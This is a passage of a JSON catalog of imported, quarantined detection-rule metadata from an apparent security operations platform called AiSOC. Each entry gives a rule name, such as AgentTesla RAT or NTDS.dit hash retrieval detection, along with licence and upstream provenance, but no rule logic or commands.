"AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/abusing-azure-browser-sso.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "abusing_azure_browser_sso", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/abusing_azure_browser_sso.yaral" } }, { "id": "chronicle-detection-rules-abusing-managebdewsf", "type": "detection", "name": "abusing_managebdewsf", "description": "abusing_managebdewsf", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/abusing-managebdewsf.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "abusing_managebdewsf", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/abusing_manage_bde_wsf.yaral" } }, { "id": "chronicle-detection-rules-abusing-security-support-provider-and-authentication-packages", "type": "detection", "name": "abusing_security_support_provider_and_authentication_packages", "description": "abusing_security_support_provider_and_authentication_packages", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/abusing-security-support-provider-and-authentication-packages.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "abusing_security_support_provider_and_authentication_packages", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/abusing_security_support_provider_and_authentication_packages.yaral" } }, { "id": "chronicle-detection-rules-abusing-settingcontentms-to-launch-arbitrary-shell-command-execution", "type": "detection", "name": "abusing_settingcontentms_to_launch_arbitrary_shell_command_execution", "description": "abusing_settingcontentms_to_launch_arbitrary_shell_command_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/abusing-settingcontentms-to-launch-arbitrary-shell-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "abusing_settingcontentms_to_launch_arbitrary_shell_command_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/abusing_settingcontent_ms_to_launch_arbitrary_shell_command_execution.yaral" } }, { "id": "chronicle-detection-rules-abusing-windows-telemetry-compattelrunnerexeaudit-rule", "type": "detection", "name": "abusing_windows_telemetry_compattelrunnerexeaudit_rule", "description": "abusing_windows_telemetry_compattelrunnerexeaudit_rule", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/abusing-windows-telemetry-compattelrunnerexeaudit-rule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "abusing_windows_telemetry_compattelrunnerexeaudit_rule", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/abusing_windows_telemetry_compattelrunner_exe_audit_rule.yaral" } }, { "id": "chronicle-detection-rules-access-to-admin-share", "type": "detection", "name": "access_to_admin_share", "description": "access_to_admin_share", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/access-to-admin-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "access_to_admin_share", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/access_to_admin__share.yaral" } }, { "id": "chronicle-detection-rules-account-discovery-activity-detector-sysmon-behavior", "type": "detection", "name": "account_discovery_activity_detector_sysmon_behavior", "description": "account_discovery_activity_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/account-discovery-activity-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "account_discovery_activity_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/account_discovery_activity_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-account-tampering-suspicious-failed-logon-reasons", "type": "detection", "name": "account_tampering__suspicious_failed_logon_reasons", "description": "account_tampering__suspicious_failed_logon_reasons", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/account-tampering-suspicious-failed-logon-reasons.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "account_tampering__suspicious_failed_logon_reasons", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/account_tampering___suspicious_failed_logon_reasons.yaral" } }, { "id": "chronicle-detection-rules-acer-quick-access-dll-searchorder-hijacking-and-potential-abuses", "type": "detection", "name": "acer_quick_access__dll_searchorder_hijacking_and_potential_abuses", "description": "acer_quick_access__dll_searchorder_hijacking_and_potential_abuses", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/acer-quick-access-dll-searchorder-hijacking-and-potential-abuses.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "acer_quick_access__dll_searchorder_hijacking_and_potential_abuses", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/sysmon/acer_quick_access___dll_search_order_hijacking_and_potential_abuses.yaral" } }, { "id": "chronicle-detection-rules-active-directory-as-a-c2-command-control", "type": "detection", "name": "active_directory_as_a_c2_command__control", "description": "active_directory_as_a_c2_command__control", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/active-directory-as-a-c2-command-control.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "active_directory_as_a_c2_command__control", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/active_directory_security/windows/active_directory_as_a_c2__command___control.yaral" } }, { "id": "chronicle-detection-rules-active-directory-replication-from-non-machine-account", "type": "detection", "name": "active_directory_replication_from_non_machine_account", "description": "active_directory_replication_from_non_machine_account", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/active-directory-replication-from-non-machine-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "active_directory_replication_from_non_machine_account", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/active_directory_security/windows/active_directory_replication_from_non_machine_account.yaral" } }, { "id": "chronicle-detection-rules-activity-related-to-ntdsdit-domain-hash-retrieval", "type": "detection", "name": "activity_related_to_ntdsdit_domain_hash_retrieval", "description": "activity_related_to_ntdsdit_domain_hash_retrieval", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/activity-related-to-ntdsdit-domain-hash-retrieval.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "activity_related_to_ntdsdit_domain_hash_retrieval", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/activity_related_to_ntds_dit_domain_hash_retrieval.yaral" } }, { "id": "chronicle-detection-rules-ad-privileged-users-or-groups-reconnaissance", "type": "detection", "name": "ad_privileged_users_or_groups_reconnaissance", "description": "ad_privileged_users_or_groups_reconnaissance", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ad-privileged-users-or-groups-reconnaissance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ad_privileged_users_or_groups_reconnaissance", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/ad_privileged_users_or_groups_reconnaissance.yaral" } }, { "id": "chronicle-detection-rules-add-programs-to-firewall-exclusion-from-temp-directory-sysmon", "type": "detection", "name": "add_programs_to_firewall_exclusion_from_temp_directory_sysmon", "description": "add_programs_to_firewall_exclusion_from_temp_directory_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/add-programs-to-firewall-exclusion-from-temp-directory-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "add_programs_to_firewall_exclusion_from_temp_directory_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/add_programs_to_firewall_exclusion_from_temp_directory__sysmon.yaral" } }, { "id": "chronicle-detection-rules-addition-of-sid-history-to-active-directory-object", "type": "detection", "name": "addition_of_sid_history_to_active_directory_object", "description": "addition_of_sid_history_to_active_directory_object", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/addition-of-sid-history-to-active-directory-object.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "addition_of_sid_history_to_active_directory_object", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/active_directory_security/windows/addition_of_sid_history_to_active_directory_object.yaral" } }, { "id": "chronicle-detection-rules-adfs-db-suspicious-named-pipe-connection", "type": "detection", "name": "adfs_db_suspicious_named_pipe_connection", "description": "adfs_db_suspicious_named_pipe_connection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/adfs-db-suspicious-named-pipe-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "adfs_db_suspicious_named_pipe_connection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/adfs/adfs_db_suspicious_named_pipe_connection.yaral" } }, { "id": "chronicle-detection-rules-adfs-dkm-key-access", "type": "detection", "name": "adfs_dkm_key_access", "description": "adfs_dkm_key_access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/adfs-dkm-key-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "adfs_dkm_key_access", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/adfs/adfs_dkm_key_access.yaral" } }, { "id": "chronicle-detection-rules-admin-user-rdp", "type": "detection", "name": "admin_user_rdp", "description": "admin_user_rdp", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/admin-user-rdp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "admin_user_rdp", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/admin_user_rdp.yaral" } }, { "id": "chronicle-detection-rules-admin-user-remote-logon", "type": "detection", "name": "admin_user_remote_logon", "description": "admin_user_remote_logon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/admin-user-remote-logon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "admin_user_remote_logon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/admin_user_remote_logon.yaral" } }, { "id": "chronicle-detection-rules-adwind-detection", "type": "detection", "name": "adwind_detection", "description": "adwind_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/adwind-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "adwind_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/adwind_detection.yaral" } }, { "id": "chronicle-detection-rules-adwind-rat-jrat", "type": "detection", "name": "adwind_rat__jrat", "description": "adwind_rat__jrat", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/adwind-rat-jrat.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "adwind_rat__jrat", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/adwind_rat___jrat_part_1.yaral" } }, { "id": "chronicle-detection-rules-adwind-rat-jrat-part-1", "type": "detection", "name": "adwind_rat__jrat_part_1", "description": "adwind_rat__jrat_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/adwind-rat-jrat-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "adwind_rat__jrat_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/adwind_rat___jrat_part_2.yaral" } }, { "id": "chronicle-detection-rules-adwind-rat-jrat-part-2", "type": "detection", "name": "adwind_rat__jrat_part_2", "description": "adwind_rat__jrat_part_2", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/adwind-rat-jrat-part-2.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "adwind_rat__jrat_part_2", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/adwind_rat___jrat_part_3.yaral" } }, { "id": "chronicle-detection-rules-agenttesla-rat-detection", "type": "detection", "name": "agenttesla_rat_detection", "description": "agenttesla_rat_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/agenttesla-rat-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "agenttesla_rat_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/agenttesla_rat_detection.yaral" } }, { "id": "chronicle-detection-rules-amadey-botnet-detection-ta505", "type": "detection", "name": "amadey_botnet_detection_ta505", "description": "amadey_botnet_detection_ta505", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/amadey-botnet-detection-ta505.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "amadey_botnet_detection_ta505", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/amadey_botnet_detection__ta505_part_1.yaral" } }, { "id": "chronicle-detection-rules-amadey-botnet-detection-ta505-part-1", "type": "detection", "name": "amadey_botnet_detection_ta505_part_1", "description": "amadey_botnet_detection_ta505_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/amadey-botnet-detection-ta505-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "amadey_botnet_detection_ta505_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/amadey_botnet_detection__ta505_part_2.yaral" } }, { "id": "chronicle-detection-rules-anomalous-invocation-of-cmdexe", "type": "detection", "name": "anomalous_invocation_of_cmdexe", "description": "anomalous_invocation_of_cmdexe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/anomalous-invocation-of-cmdexe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "anomalous_invocation_of_cmdexe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/anomalous_invocation_of_cmd_exe.yaral" } }, { "id": "chronicle-detection-rules-anonymous-user-changed-machine-password", "type": "detection", "name": "anonymous_user_changed_machine_password", "description": "anonymous_user_changed_machine_password", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/anonymous-user-changed-machine-password.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "anonymous_user_changed_machine_password", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/security/anonymous_user_changed_machine_password.yaral" } }, { "id": "chronicle-detection-rules-antivirus-exploitation-framework-detection", "type": "detection", "name": "antivirus_exploitation_framework_detection", "description": "antivirus_exploitation_framework_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/antivirus-exploitation-framework-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "antivirus_exploitation_framework_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/antivirus/antivirus_exploitation_framework_detection.yaral" } }, { "id": "chronicle-detection-rules-antivirus-password-dumper-detection", "type": "detection", "name": "antivirus_password_dumper_detection", "description": "antivirus_password_dumper_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/antivirus-password-dumper-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "antivirus_password_dumper_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/antivirus/antivirus_password_dumper_detection.yaral" } }, { "id": "chronicle-detection-rules-antivirus-relevant-file-paths-alerts", "type": "detection", "name": "antivirus_relevant_file_paths_alerts", "description": "antivirus_relevant_file_paths_alerts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/antivirus-relevant-file-paths-alerts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "antivirus_relevant_file_paths_alerts", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/antivirus/antivirus_relevant_file_paths_alerts.yaral" } }, { "id": "chronicle-detection-rules-antivirus-web-shell-detection", "type": "detection", "name": "antivirus_web_shell_detection", "description": "antivirus_web_shell_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/antivirus-web-shell-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "antivirus_web_shell_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/antivirus/antivirus_web_shell_detection.yaral" } }, { "id": "chronicle-detection-rules-appinit-dll-hijacking-sysmon-behaviour", "type": "detection", "name": "appinit_dll_hijacking_sysmon_behaviour", "description": "appinit_dll_hijacking_sysmon_behaviour", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/appinit-dll-hijacking-sysmon-behaviour.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "appinit_dll_hijacking_sysmon_behaviour", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/appinit_dll_hijacking__sysmon_behaviour.yaral" } }, { "id": "chronicle-detection-rules-apt-user-agent", "type": "detection", "name": 